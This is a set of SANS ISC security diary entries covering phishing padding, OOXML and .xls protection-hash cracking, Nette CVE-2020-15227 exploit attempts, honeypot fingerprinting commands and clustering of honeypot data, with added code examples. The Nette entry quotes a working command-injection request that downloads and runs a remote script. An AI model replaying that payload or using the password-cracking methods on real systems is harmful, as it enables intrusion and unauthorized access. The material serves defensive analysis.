Diaries

Published: 2024-07-16

"Reply-chain phishing" with a twist

A few weeks ago, I was asked by a customer to take a look at a phishing message which contained a link that one of their employees had clicked on. The concern was whether the linked-to site was only a generic credential-stealing web page or something targeted and potentially more dangerous. Luckily, it was only a run-of-the-mill phishing kit login page; nevertheless, the e-mail message itself turned out to be somewhat more interesting, since although it didn't look like anything special, it did make it to the recipient's inbox instead of the e-mail quarantine where it should have ended up.

The reason for this was probably that the message in question contained what looked like a reply to a previous e-mail exchange. This might have made it appear more trustworthy to the spam/phishing detection mechanisms that scanned it, since, as far as my understanding goes, automated spam/phishing detection mechanisms tend to consider messages with reply-chains somewhat more trustworthy than plain, unsolicited e-mails from unknown senders.

It should be mentioned that threat actors commonly use replies to legitimate messages in account takeover/BEC-style phishing attacks; in this case, however, the situation was somewhat different: the original (replied-to) message was from someone not associated with the targeted organization in any way. Use of this approach (i.e., "replying" to a message with no relevance to the recipient) can sometimes be seen in generic phishing. However, if someone receives an e-mail which contains a reply to a message from someone they have never even heard of, it doesn't exactly make the message appear trustworthy, which is where the slight twist used in this message comes in.

In the message, the "reply" part was hidden from the recipient below a long list of empty paragraphs (well, paragraphs containing only a non-breaking space). Although this technique is not new, the aforementioned customer's IT specialists weren't aware of it, and a quick Google search failed to provide any write-ups of it, so I thought it might be worthwhile to go over it here.

As the following example from my "phishing collection" shows, at first glance an e-mail message in which this technique is used would look quite normal, and a recipient might not notice anything suspicious (besides the overall "this is an obvious phishing" vibe).

Only if one noticed that the scrollbar on the right side of the window indicates that there is (literally) much more to the message than there appears to be would one discover the text of the original reply-chain, which, in this instance, is hidden below 119 empty paragraphs.

Although the aforementioned technique is hardly the most common (or most dangerous) one when it comes to phishing, since it is being used “in the wild”, a short mention of it might make a good addition to any security awareness training (e.g., something along the lines of “if you see a large scrollbar next to the body of a short e-mail, it is a definite indicator that something is amiss”)…
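As an added example (not part of the diary), the following Python heuristic parses an HTML message body, measures the longest run of paragraphs that hold only whitespace or a non-breaking space, and flags bodies where visible text follows such a run; the sample body and the threshold of 20 paragraphs are constructed assumptions.

```python
from html.parser import HTMLParser

# Constructed sample body (not a real message): a short lure, then 119 paragraphs
# holding only a non-breaking space, then the unrelated "reply" the recipient
# would only discover by scrolling.
SAMPLE_HTML = (
    "<html><body><p>Please review the attached invoice and confirm.</p>"
    + "<p>&nbsp;</p>" * 119
    + "<p>From: sender@example.invalid<br>Subject: Re: our call</p>"
    + "<p>Text of an earlier, unrelated message.</p></body></html>"
)


class ParagraphScanner(HTMLParser):
    """Records, for every <p>...</p>, whether it contained only whitespace / &nbsp; / <br>."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # &nbsp; arrives as "\xa0"
        self.paragraphs = []  # True = empty paragraph, False = has visible text
        self._in_p = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "p":
            self._in_p, self._buf = True, []

    def handle_endtag(self, tag):
        if tag == "p" and self._in_p:
            text = "".join(self._buf).replace("\xa0", " ").strip()
            self.paragraphs.append(text == "")
            self._in_p = False

    def handle_data(self, data):
        if self._in_p:
            self._buf.append(data)


def longest_empty_run(html):
    """Return (length of the longest run of empty paragraphs,
    True if a paragraph with visible text follows that run)."""
    scanner = ParagraphScanner()
    scanner.feed(html)
    flags = scanner.paragraphs
    best_len, best_end, run = 0, -1, 0
    for i, empty in enumerate(flags):
        run = run + 1 if empty else 0
        if run > best_len:
            best_len, best_end = run, i
    text_after = best_len > 0 and any(not e for e in flags[best_end + 1:])
    return best_len, text_after


def is_padded_reply_chain(html, threshold=20):
    """Flag a body whose longest empty-paragraph run reaches the (assumed) threshold
    and that hides further text below it: the "large scrollbar on a short e-mail" sign."""
    run_len, text_after = longest_empty_run(html)
    return run_len >= threshold and text_after
```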

-----------
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting


Published: 2024-07-15

Protected OOXML Spreadsheets

I was asked a question about the protection of an .xlsm spreadsheet. I've written before on the protection of .xls spreadsheets, for example in diary entries "Unprotecting Malicious Documents For Inspection" and "16-bit Hash Collisions in .xls Spreadsheets"; and blog post "Quickpost: oledump.py plugin_biff.py: Remove Sheet Protection From Spreadsheets".

.xlsm spreadsheets (and .xlsx) are OOXML files, and are thus ZIP files containing mostly XML files:

The spreadsheet I'm taking as an example here has a protected sheet. Let's take a look at the XML file for this sheet by piping zipdump.py's output into xmldump.py:

XML element sheetProtection protects this sheet. If you remove this element, the sheet becomes unprotected.

The password used to protect this sheet is hashed, and the hash value is stored as an attribute of element sheetProtection.

Let's print out each attribute on a different line:

The password is hashed a hundred thousand times (attribute spinCount) with SHA-512 (attribute algorithmName) together with a salt (attribute saltValue, base64 encoded). The result is stored in attribute hashValue (base64 encoded).

Here is the algorithm in Python:

import binascii
import hashlib
import struct

def CalculateHash(password, salt, spinCount=100000):
    # OOXML hashes the password as UTF-16LE without a byte order mark
    passwordBytes = password.encode('utf-16-le')
    buffer = salt + passwordBytes
    hash = hashlib.sha512(buffer).digest()
    # spinCount extra rounds (attribute spinCount, 100000 here), each appending the round counter
    for iter in range(spinCount):
        buffer = hash + struct.pack('<I', iter)
        hash = hashlib.sha512(buffer).digest()
    return hash

def Verify(password, salt, hash):
    # salt and hash are the base64 strings taken from attributes saltValue and hashValue
    hashBytes = binascii.a2b_base64(hash)
    return hashBytes == CalculateHash(password, binascii.a2b_base64(salt))

Spreadsheet protected-all.xlsx is a spreadsheet I created with 3 types of protections: modification protection, workbook protection and sheet protection:

I released a new version of xmldump.py to extract these hashes and format them for hashcat:

For each extracted hash, the lines are:

  1. the name of the containing file
  2. the name of the protecting element (which can be removed should you want to disable that particular protection)
  3. the hashcat compatible hash (hash mode 25300)
  4. a hashcat command to crack this hash with a wordlist

You can imagine that cracking these hashes with hashcat is rather slow, because 100,000 SHA-512 hash operations need to be executed for each candidate password. On a desktop with an NVIDIA GeForce RTX 3080 GPU, I got around 24,000 hashes per second.
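As an added example (not the diary's code and not part of xmldump.py), the following Python parses the sheetProtection element out of a worksheet part, verifies a candidate password with the SHA-512/spinCount scheme described above, and shows the "remove the element" unprotect step; the worksheet XML is constructed in build_sample_sheet_xml, and the salt and password are assumptions.

```python
import base64
import hashlib
import hmac
import struct
import xml.etree.ElementTree as ET

NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
ET.register_namespace("", NS)  # keep the worksheet XML free of ns0: prefixes when re-serialised


def calculate_hash(password, salt, spin_count):
    """ECMA-376 sheet protection hash: SHA-512(salt || UTF-16LE(password)), then
    spin_count rounds of SHA-512(previous digest || little-endian 32-bit round counter)."""
    digest = hashlib.sha512(salt + password.encode("utf-16-le")).digest()
    for i in range(spin_count):
        digest = hashlib.sha512(digest + struct.pack("<I", i)).digest()
    return digest


def read_sheet_protection(sheet_xml):
    """Return the decoded sheetProtection parameters, or None when the sheet is unprotected."""
    root = ET.fromstring(sheet_xml)
    elem = root.find(f"{{{NS}}}sheetProtection")
    if elem is None:
        return None
    return {
        "algorithm": elem.get("algorithmName"),
        "salt": base64.b64decode(elem.get("saltValue")),
        "hash": base64.b64decode(elem.get("hashValue")),
        "spin_count": int(elem.get("spinCount")),
    }


def verify_sheet_password(sheet_xml, password):
    """True/False for a protected sheet; None when there is no sheetProtection element."""
    prot = read_sheet_protection(sheet_xml)
    if prot is None:
        return None
    if prot["algorithm"] != "SHA-512":
        raise ValueError(f"unsupported algorithmName: {prot['algorithm']}")
    candidate = calculate_hash(password, prot["salt"], prot["spin_count"])
    return hmac.compare_digest(candidate, prot["hash"])


def remove_sheet_protection(sheet_xml):
    """Drop the sheetProtection element: the hash only gates editing in the UI,
    so removing the element is enough to unprotect the sheet for inspection."""
    root = ET.fromstring(sheet_xml)
    for elem in root.findall(f"{{{NS}}}sheetProtection"):
        root.remove(elem)
    return ET.tostring(root, encoding="unicode")


def build_sample_sheet_xml(password, salt=bytes(range(16)), spin_count=100000):
    """Constructed minimal worksheet part (not taken from a real file) carrying a
    sheetProtection element for the given password; salt is an assumed value."""
    hash_b64 = base64.b64encode(calculate_hash(password, salt, spin_count)).decode()
    salt_b64 = base64.b64encode(salt).decode()
    return (
        f'<worksheet xmlns="{NS}"><sheetData/>'
        f'<sheetProtection algorithmName="SHA-512" hashValue="{hash_b64}" '
        f'saltValue="{salt_b64}" spinCount="{spin_count}" sheet="1" objects="1" scenarios="1"/>'
        "</worksheet>"
    )
```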

Didier Stevens
Senior handler
blog.DidierStevens.com


Published: 2024-07-14

Wireshark 4.2.6 Released

Wireshark release 4.2.6 fixes 1 vulnerability (SPRT parser crash) and 10 bugs.

Didier Stevens
Senior handler
blog.DidierStevens.com


Published: 2024-07-13

16-bit Hash Collisions in .xls Spreadsheets

A couple of years ago, in diary entry "Unprotecting Malicious Documents For Inspection", I explained how .xls spreadsheets are password protected (but not encrypted). And in follow-up diary entry "Maldocs: Protection Passwords", I talked about an update to my oledump plugin plugin_biff.py to crack these passwords using password lists (by default, an embedded password list is used that is taken from the 2011 public-domain default password list used by John The Ripper).

Since the hashing algorithm used for the protection of .xls files produces a 16-bit integer with its highest bit set, there are 32768 (0x8000) possible hash values (called verifier), and thus ample chance to generate hash collisions.

I generated such a list of colliding passwords (one for each possible verifier value), and included it in an update of my oledump plugin plugin_biff.py:

I took care to generate passwords prioritizing letters and digits over special characters.

Here is an example of a .xls workbook with a protected sheet. The protection password I used for this sheet is azeqsdwxc, a weak password that is not in the embedded list. Thus this password is not found in the password list when plugin plugin_biff.py attempts to crack it:

With previous versions of plugin plugin_biff.py, the report would state that the password was not cracked. But in this new version, when a password cannot be cracked with the embedded or provided password list, the password is taken from the embedded verifier table. In this case, that password is bbbbhz (the verifier is 0xd9b1).

This means that both password azeqsdwxc and bbbbhz hash to the same value: verifier 0xd9b1.

And thus the sheet can also be unprotected with password bbbbhz:

So with this new version of oledump plugin plugin_biff.py, a password will always be provided for protected .xls files, whatever the value of the verifier.

Of course, this is only useful if you don't want or can't alter the sheet to remove the protection. Since these passwords just offer protection, and are not actually used to encrypt, it's possible to remove the protection without knowing the password, as I explained in my blog post "Quickpost: oledump.py plugin_biff.py: Remove Sheet Protection From Spreadsheets".
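As an added example (not the plugin's code), the following Python implements the legacy .xls protection verifier and reproduces the collision above: both azeqsdwxc and bbbbhz map to 0xd9b1, and the final XOR with 0xCE4B is why every verifier has its top bit set. Only non-empty single-byte (ASCII/Latin-1) passwords are assumed.

```python
from collections import defaultdict


def rotate_left_15(value):
    """Rotate a 15-bit value left by one position (bit 14 wraps round to bit 0)."""
    return ((value << 1) & 0x7FFF) | ((value >> 14) & 0x0001)


def xls_password_verifier(password):
    """Legacy .xls sheet/workbook protection verifier (the 16-bit value stored in the BIFF record).
    Characters are folded in from last to first, each XORed into a rotating 15-bit register;
    the final XOR with the password length and 0xCE4B always sets bit 15, so only 0x8000
    (32768) distinct values exist."""
    if not password:
        raise ValueError("verifier is only defined here for a non-empty password")
    verifier = 0
    for byte in reversed(password.encode("latin-1")):
        verifier = rotate_left_15(verifier) ^ byte
    verifier = rotate_left_15(verifier)
    return verifier ^ len(password) ^ 0xCE4B


def password_matches(password, stored_verifier):
    """What the protection check amounts to: any password with the same verifier is accepted."""
    return xls_password_verifier(password) == stored_verifier


def group_by_verifier(words):
    """Bucket a word list by verifier; buckets with more than one entry are collisions,
    which is the kind of table the plugin's embedded verifier list is built from."""
    buckets = defaultdict(list)
    for word in words:
        buckets[xls_password_verifier(word)].append(word)
    return dict(buckets)
```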


Didier Stevens
Senior handler
blog.DidierStevens.com


Published: 2024-07-12

Attacks against the "Nette" PHP framework CVE-2020-15227

Today, I noticed some exploit attempts against an older vulnerability in the "Nette Framework", CVE-2020-15227 [1].

Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

Today, I noticed yet another variation of an exploit for CVE-2020-15227:

 /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

Even though the exploit is old, and the line above loads a simple DDoS agent, the agent itself has not been uploaded to Virustotal yet [2].

The malware was written in Go, and Virustotal's "Behaviour" analysis does a pretty good job in summarizing the binary.

  • The binary uses crontab and systemd for persistence.
  • It uses sosbot.icu on port 1314 for command and control.

[1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
[2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


Published: 2024-07-11

Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots

Some of the commands observed can be confusing for a novice looking at ssh honeypot logs. Sure, you have some obvious commands like "uname -a" to fingerprint the kernel. However, other commands are less intuitive and are not commands a normal user would use. I am trying to summarize some of the more common ones here, focusing on commands attackers use to figure out if they are inside a honeypot.

busybox dd if=$SHELL bs=22 count=1||dd if=/proc/self/exe bs=22 count=1||while read i;do busybox echo -n $i;done</proc/self/exe||cat /proc/self/exe

There is a lot going on with this line. Let's take it apart one command at a time:

busybox: Busybox is a special binary found on many IoT style systems. It fulfills the role of various other Linux utilities in one small package. It is often symlinked from other names like "ls". 

dd: "dd" (disk dump) is often used to copy disk images, but it can be used to read or write any binary file. Here the attacker reads the first 22 bytes of the "$SHELL" binary, usually something like "/bin/bash". A typical output would be " ELF>" for an ELF binary (the ELF magic bytes, with the non-printable bytes not shown).

Next, the attacker is doing the same to the current binary (/proc/self/exe). I believe the purpose of this command line may be to eliminate some honeypots as this command will not work in simulations like cowrie.

I have seen variations of this, for example:

dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s

/bin/busybox dd if=/bin/busybox bs=22 count=1||while read i;do /bin/busybox echo -n $i;done</bin/busybox||cat /proc/self/exe

The next line uses a slightly different trick to figure out if the attacker is inside a honeypot:

cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox ZRKTA

/dev/shm is the "ramdisk", a special file system found on most Linux systems. Here the attacker just copies a file to it to see if the copy succeeds. The attacker first views the content of the file ".s", and later copies the echo command to .s just to see if there are any errors. The busybox command at the end just serves as a simple marker to note that the commands completed.

Next, a partial command I see a lot:

(/bin/busybox echo -e \"\\x44\\x49\\x52\"||echo -e \"\\x44\\x49\\x52\")

"echo -e" will output the text identified by the ASCII hex codes. The exact output may vary a bit from system to system, as "-e" is not a standard option, but you will get something like:

$ echo -e \"\\x44\\x49\\x52\"
"DIR"

Adding this as an argument to busybox is an attempt to execute a "DIR" command. The goal is not to execute the "DIR" command (it does not exist in Linux). Instead, seeing the "DIR" output will tell the attacker that the command succeeded. 

Seen any other tricks used by attackers lately? Any questions about an odd command logged by cowrie? Let me know! :) 
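As an added example (not from the diary or from cowrie), the following Python tags each of the commands discussed above with the fingerprinting trick it represents, running over a few constructed log lines; the log line framing ("[session N] CMD: ..."), the tag names and the regular expressions are assumptions made for this example.

```python
import re

# Constructed log lines in the shape of a honeypot text log (timestamps, session ids
# and the "CMD:" framing are assumptions; the commands are the ones discussed above).
SAMPLE_LOG = r"""2024-07-11T10:00:01 [session 1] CMD: uname -a
2024-07-11T10:00:02 [session 1] CMD: busybox dd if=$SHELL bs=22 count=1||dd if=/proc/self/exe bs=22 count=1||while read i;do busybox echo -n $i;done</proc/self/exe||cat /proc/self/exe
2024-07-11T10:00:03 [session 1] CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox ZRKTA
2024-07-11T10:00:04 [session 1] CMD: (/bin/busybox echo -e \"\\x44\\x49\\x52\"||echo -e \"\\x44\\x49\\x52\")
2024-07-11T10:00:05 [session 2] CMD: ls -la /root
"""

# Each tag names one honeypot-fingerprinting trick; a command gets the tag when any pattern matches.
FINGERPRINT_PATTERNS = {
    "kernel_fingerprint": [r"\buname\s+-a\b"],
    # read the first bytes of a real binary (ELF header) with dd, or dump /proc/self/exe
    "elf_header_probe": [
        r"\bdd\b[^|;]*\bif=(?:\$SHELL|/proc/self/exe|/bin/busybox)",
        r"\bcat\s+/proc/self/exe\b",
    ],
    # copy /bin/echo into the ramdisk to check that writes succeed
    "shm_write_probe": [r"/dev/shm\b.*\bcp\s+/bin/echo\s+\.s\b"],
    # a random uppercase "applet" name handed to busybox as a completion marker
    "busybox_applet_marker": [r"\bbusybox\s+[A-Z]{4,8}(?:\s|$)"],
    # echo -e of the hex bytes for "DIR", whose output tells the attacker the command ran
    "dir_echo_marker": [r"\becho\s+-e\s+\S*x44\S*x49\S*x52"],
}
COMPILED = {tag: [re.compile(p) for p in pats] for tag, pats in FINGERPRINT_PATTERNS.items()}
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+\[session (?P<session>\d+)\]\s+CMD:\s+(?P<cmd>.*)$")


def classify_command(cmd):
    """Sorted list of fingerprinting tags that apply to one command line."""
    return sorted(tag for tag, pats in COMPILED.items() if any(p.search(cmd) for p in pats))


def classify_log(text):
    """Parse the log into (session, command, tags) triples; lines that do not parse are skipped."""
    rows = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            rows.append((m["session"], m["cmd"], classify_command(m["cmd"])))
    return rows


def sessions_fingerprinting(text, min_tags=2):
    """Sessions that used at least min_tags distinct fingerprinting tricks."""
    seen = {}
    for session, _, tags in classify_log(text):
        seen.setdefault(session, set()).update(tags)
    return sorted(s for s, tags in seen.items() if len(tags) >= min_tags)
```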

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


Published: 2024-07-10

Finding Honeypot Data Clusters Using DBSCAN: Part 1

Sometimes data needs to be transformed or different tools need to be used so that it can be compared with other data. Some honeypot data is easy to compare since there is no customized information such as randomly generated file names, IP addresses, etc.


Figure 1: Common commands seen across multiple honeypots

The examples above are easy to compare, and among the most commonly seen commands there is a large overlap across the different honeypots. Are those the most common commands? What about commands that are very similar, but have small differences?


Figure 2: Commands used to change passwords, but with differences in the username or password supplied.

Password change attempts are just one example of commands that are very similar, with small changes in input. From the dataset, there are 77,214 instances of "passwd" being used in a command. This means that it could be the most commonly used command seen across all of the honeypots: it has been seen over 20,000 more times than the top command in Figure 1. From this quick filter using DB Browser for SQLite [1], a list of possibly similar commands was generated very quickly. With only 80,715 total rows, almost 97% of the commands might be password changes. One option would be to take the list as it is. Unfortunately, this can imply a grouping that may not be desired: there are some commands that also contain "passwd" but are not strictly password changes. In the example below, we see a concatenated command that includes creating a user account and setting a new password for it. It would be nice to get a list of similar commands.


Figure 3: Commands with "passwd", but from very different commands

DBSCAN (Density-Based Spatial Clustering of Applications with Noise)

DBSCAN [2] was introduced to me in SEC 595, Applied Data Science and AI/Machine Learning for Cybersecurity Professionals [3]. To start out, I need to determine the following:

  • Dataset
  • Features (features of the data that help to separate data into different clusters)
  • Minimum Samples (min_samples)
  • Epsilon (eps)

Dataset

To help reduce the data to be analyzed, a subset of the original data was used: only rows where at least one honeypot had no results were extracted.

# commands holds the data read from the SQLite file (one row per command,
# with the per-honeypot results in the remaining columns)
# get any rows that contain a 0 (i.e., at least one honeypot never saw the command)
unique_commands = commands[(commands == 0).any(axis=1)]

# 'index' is the column holding the command text
# keep the columns up to and including "index"
unique_commands = unique_commands.loc[:, :"index"]

# label of the command column, used by the feature code below
column_label = "index"

Features

As a starting point, I decided to see what would happen when just trying to use character frequencies as features. Some characters were selected based on what is seen within the data.

# using string to take advantage of built-in character collections
import string

# create a list with all characters to count (get a frequency for); the escaped entries
# are regular expressions, because pandas' str.count() interprets its argument as a regex
chars_to_count = list(string.ascii_uppercase) + list(string.ascii_lowercase)
chars_to_count += [";", "\\/", "\\//", "\\=", "\\$", " ", ",", "_", ".", "\\%", "\\&"]

# add a column for each character, holding the count of that character within each command
# (note: the unescaped "." is a regex wildcard, so that column counts every character,
# i.e. the command length)
for each_char in chars_to_count:
    unique_commands[each_char] = unique_commands[column_label].str.count(each_char)

# Comparisons used: 'A' .. 'Z', 'a' .. 'z', ';', '\\/', '\\//', '\\=', '\\$', ' ', ',', '_', '.', '\\%', '\\&'

Minimum Samples and Epsilon

I decided to experimentally change "min_samples" and "eps" to see how it impacted the number of clusters created and what was created within those clusters. In general, the following is true:

  • Lower "eps" = more clusters
  • Lower "min_samples" = more clusters

# 3, 4, 5, 6, 7, 8, 9, 10, 11 for min_samples (range() stops before its upper bound)
minsamples_values = range(3, 12)

# .5 to 2.5, incrementing by .1
eps_values = []
current_value = .5
limit = 2.5
while current_value <= limit:
    eps_values.append(current_value)
    current_value = round(current_value + .1, 1)

Cluster Differences

Min number of clusters: 5
Max number of clusters: 73
Average: 18


Figure 4: Plot of the number of clusters formed based on "eps" and "min_samples" value changes.

Overall, the data was not surprising in that lower "eps" values and "min_samples" values created more clusters. Let's take a look at the middle, for a low "min_samples" value and a run that produced 46 clusters (eps=0.7, min_samples=3).

Figure 5: Excerpt of clustered data with an incorrect cluster highlighted

Cluster 5 shows some promise in terms of the clusters being created. Cluster 6 shows an outlier but overall still looks very good. Some of the challenges with the data being used are:

  • High number of features
  • Number of characters (len) is causing inaccurate clustering and could be weighted too high
  • Some characters present in the data not being used as features ("@", "<", ">", and "=" not represented)


Changing Features

To see if changing the features could help, the features were changed and included only special characters seen within the data (numbers and letters were filtered out).

import re

# create a dictionary that contains every character and the number of times it is represented
command_char_counts = {}
for each_item in unique_commands["index"]:
    for each_char in each_item:
        # exclude numbers and letters, keeping only special characters
        if each_char.isdigit() or each_char in string.ascii_letters:
            continue
        command_char_counts[each_char] = command_char_counts.get(each_char, 0) + 1

# create new columns for special characters seen within the data; re.escape() makes
# regex metacharacters such as ".", "|", "+", "(" or "*" literal for str.count()
for char in command_char_counts:
    pattern = re.escape(char)
    unique_commands[pattern] = unique_commands[column_label].str.count(pattern)

# Comparisons used (column names as printed in the original run): ['/', '>', '@', "'", '#', '!', ';', '=',
# '$', ':', '\\.', '-', '\\+', '"', '\\\\', '\\|', '\\?', '&', '^', '%', '\\[', ']', '<', '\\(', '\\)',
# ',', '_', '\\*', '{', '}', '\n', '~']

This strategy seemed like it would help, since there are fewer features overall. Unfortunately, I ran into memory errors after reaching an eps of 1.3.

  • min_samples = 3, eps = 1.2 --> worked
  • min_samples = 3, eps = 1.3 --> memory error on dbscan.fit(reduced)

Since these issues prevented me from automating runs over a variety of "min_samples" and "eps" values, I decided to change the features again, aiming for even fewer features.

Changing Features (again)

Based on some of the commands contained within the data, the following features were selected:

  • "appends" (concatenated commands, containing " && ")
  • "args1" (command arguments starting with "+")
  • "args2" (command arguments starting with "-")
  • "outputs" (commands with output " > ")
  • "conditionals" (commands with " if ")
  • "command_parts" (number of individual commands separated by semicolon ";")
  • "length" (total command length)
  • "partn_length" (length of the last part, separated by semicolon ";")
  • "partn_minus_1_length" (length of the second last part, separated by semicolon ";")
  • "partn_minus_2_length" (length of the third last part, separated by semicolon ";")

import re

def find_pattern_instance_num(string, pattern):
    # number of times the pattern occurs in the command
    return len(re.findall(pattern, string))

def find_part_num(string, splitchars):
    return len(string.split(splitchars))

def find_part_length(string, splitchars, segment):
    # length of the requested part; 0 when the command has fewer parts than that
    try:
        return len(string.split(splitchars)[segment])
    except IndexError:
        return 0

appends = [find_pattern_instance_num(index, " && ") for index in unique_commands[column_label]]
args1 = [find_pattern_instance_num(index, " \+[A-Za-z] ") for index in unique_commands[column_label]]
args2 = [find_pattern_instance_num(index, " -[A-Za-z] ") for index in unique_commands[column_label]]
outputs = [find_pattern_instance_num(index, " > ") for index in unique_commands[column_label]]
conditionals = [find_pattern_instance_num(index, " if ") for index in unique_commands[column_label]]
command_parts = [find_part_num(index, ";") for index in unique_commands[column_label]]
length = [len(index) for index in unique_commands[column_label]]
partn_length = [find_part_length(index, ';', -1) for index in unique_commands[column_label]]
partn_minus_1_length = [find_part_length(index, ';', -2) for index in unique_commands[column_label]]
partn_minus_2_length = [find_part_length(index, ';', -3) for index in unique_commands[column_label]]

unique_commands["appends"] = appends
unique_commands["args1"] = args1
unique_commands["args2"] = args2
unique_commands["outputs"] = outputs
unique_commands["conditionals"] = conditionals
unique_commands["command_parts"] = command_parts
unique_commands["length"] = length
unique_commands["partn_length"] = partn_length
unique_commands["partn_minus_1_length"] = partn_minus_1_length
unique_commands["partn_minus_2_length"] = partn_minus_2_length

Min number of clusters: 10
Max number of clusters: 113
Average: 34.75

Data reviewed: eps = .5, min_samples = 9, clusters = 46

Looking at the original outlier, it appears that it is now in cluster "-1", meaning it is treated as an outlier (noise).

Figure 6: Data previously grouped incorrectly into a cluster now shown as an outlier

This doesn't mean that the clusters are perfect, or even more accurate overall, but it does show the impact of changing features and other DBSCAN variables. Experimenting with different values can be helpful when trying to determine the best settings for your data analysis.

Looking back at the original problem, how did things sort out with different commands containing "passwd"?


Figure 7: Commands listed with their associated cluster and total items seen per cluster.

The original problem command (cluster 37) is now separated. There are more clusters than desired for the password change attempts starting with "echo". These could still be classified manually, since there is a low number of clusters. The issue here is that the only value effectively used to cluster this data is the length of the command itself.


Figure 8: Password change cluster showing length as the clustering feature


We'll see where this ends up, but some good things to keep in mind when performing clustering:

  • Experiment with different eps, min_samples and features
  • Save data to review later so that it can be used to further tailor your variables
  • Putting some thought into features can help tremendously, but it requires understanding the data
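As an added example (not the diary's code, and independent of scikit-learn), the following Python computes the final ten features described above for a handful of constructed commands and clusters them with a plain DBSCAN implementation; eps=0.5, min_samples=3 and the sample commands are assumptions chosen so that the length-dominated behaviour discussed above is visible: one password change with a longer password falls out of the cluster.

```python
import math
import re

# Constructed sample commands (not from the honeypot dataset). The first three password
# changes share one length, the fourth has a password one character longer, the three
# download chains share one length, and "uname -a" stands alone.
SAMPLE_COMMANDS = [
    r'echo -e "Ab12cd34\nAb12cd34" | passwd',
    r'echo -e "Zz98yy76\nZz98yy76" | passwd',
    r'echo -e "Qq11ww22\nQq11ww22" | passwd',
    r'echo -e "Longer123\nLonger123" | passwd',
    "cd /tmp; wget http://203.0.113.5/a.sh; chmod 777 a.sh; ./a.sh",
    "cd /tmp; wget http://203.0.113.7/b.sh; chmod 777 b.sh; ./b.sh",
    "cd /tmp; wget http://203.0.113.9/c.sh; chmod 777 c.sh; ./c.sh",
    "uname -a",
]


def count_pattern(cmd, pattern):
    """Number of non-overlapping occurrences of a regex pattern in the command."""
    return len(re.findall(pattern, cmd))


def part_length(cmd, sep, index):
    """Length of the index-th (negative = from the end) separator-delimited part, 0 if absent."""
    parts = cmd.split(sep)
    return len(parts[index]) if -len(parts) <= index < len(parts) else 0


def features(cmd):
    """The ten features of the last feature set above, in that order."""
    return [
        count_pattern(cmd, r" && "),           # appends
        count_pattern(cmd, r" \+[A-Za-z] "),   # args1
        count_pattern(cmd, r" -[A-Za-z] "),    # args2
        count_pattern(cmd, r" > "),            # outputs
        count_pattern(cmd, r" if "),           # conditionals
        len(cmd.split(";")),                   # command_parts
        len(cmd),                              # length
        part_length(cmd, ";", -1),             # partn_length
        part_length(cmd, ";", -2),             # partn_minus_1_length
        part_length(cmd, ";", -3),             # partn_minus_2_length
    ]


def euclid(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def dbscan(points, eps, min_samples):
    """Plain DBSCAN with scikit-learn's convention that min_samples counts the point itself.
    Returns one label per point; -1 marks noise (outliers)."""
    n = len(points)
    neighbours = [[j for j in range(n) if euclid(points[i], points[j]) <= eps] for i in range(n)]
    labels = [None] * n
    cluster = -1
    for i in range(n):
        if labels[i] is not None:
            continue
        if len(neighbours[i]) < min_samples:
            labels[i] = -1           # provisional noise; may become a border point later
            continue
        cluster += 1
        labels[i] = cluster
        queue = list(neighbours[i])
        while queue:
            j = queue.pop()
            if labels[j] == -1:
                labels[j] = cluster  # border point reached from a core point
            if labels[j] is not None:
                continue
            labels[j] = cluster
            if len(neighbours[j]) >= min_samples:
                queue.extend(neighbours[j])  # j is a core point: keep expanding
    return labels


def cluster_commands(commands, eps=0.5, min_samples=3):
    """Cluster commands on the feature set above; returns (label, command) pairs."""
    labels = dbscan([features(c) for c in commands], eps, min_samples)
    return list(zip(labels, commands))
```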


[1] https://sqlitebrowser.org/
[2] https://scikit-learn.org/dev/auto_examples/cluster/plot_dbscan.html
[3] https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/

--
Jesse La Grew
Handler


Published: 2024-07-09

Microsoft Patch Tuesday July 2024

Microsoft today released patches for 142 vulnerabilities. Only four of the vulnerabilities are rated as "critical". Two vulnerabilities have already been publicly disclosed, and two have already been exploited.

Noteworthy Vulnerabilities:

CVE-2024-38080: Windows Hyper-V Elevation of Privilege Vulnerability (exploited vulnerability)

An attacker can obtain SYSTEM privilege by exploiting this integer overflow. 

CVE-2024-38112: Windows MSHTML Platform Spoofing Vulnerability

I haven't seen any details disclosed yet. However, these vulnerabilities typically make it difficult to identify the nature and origin of an attachment. A victim may be tricked into opening a malicious attachment, leading to code execution. There have been numerous similar vulnerabilities in the past.

CVE-2024-35264: .NET and Visual Studio Remote Code Execution Vulnerability (disclosed vulnerability)

CVSS score for this vulnerability is 8.1. It is not considered critical. The vulnerability is exploited by closing an http/3 connection while the body is still being processed. The attacker must take advantage of a race condition to execute code.

CVE-2024-37985: Systematic Identification and Characterization of Proprietary Prefetchers (disclosed vulnerability)

This vulnerability only affects ARM systems. An attacker would be able to view privileged heap memory.

CVE-2024-38074, CVE-2024-38076, CVE-2024-38077: Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability

Three of the four critical vulnerabilities affect the RDP Licensing Service. Watch out for PoC exploits for these vulnerabilities.

CVE-2024-38060: Windows Imaging Component Remote Code Execution Vulnerability

The WIC is the Windows framework used to parse images and related metadata. To trigger the vulnerability, an authenticated attacker must upload a TIFF image to a server.

Description
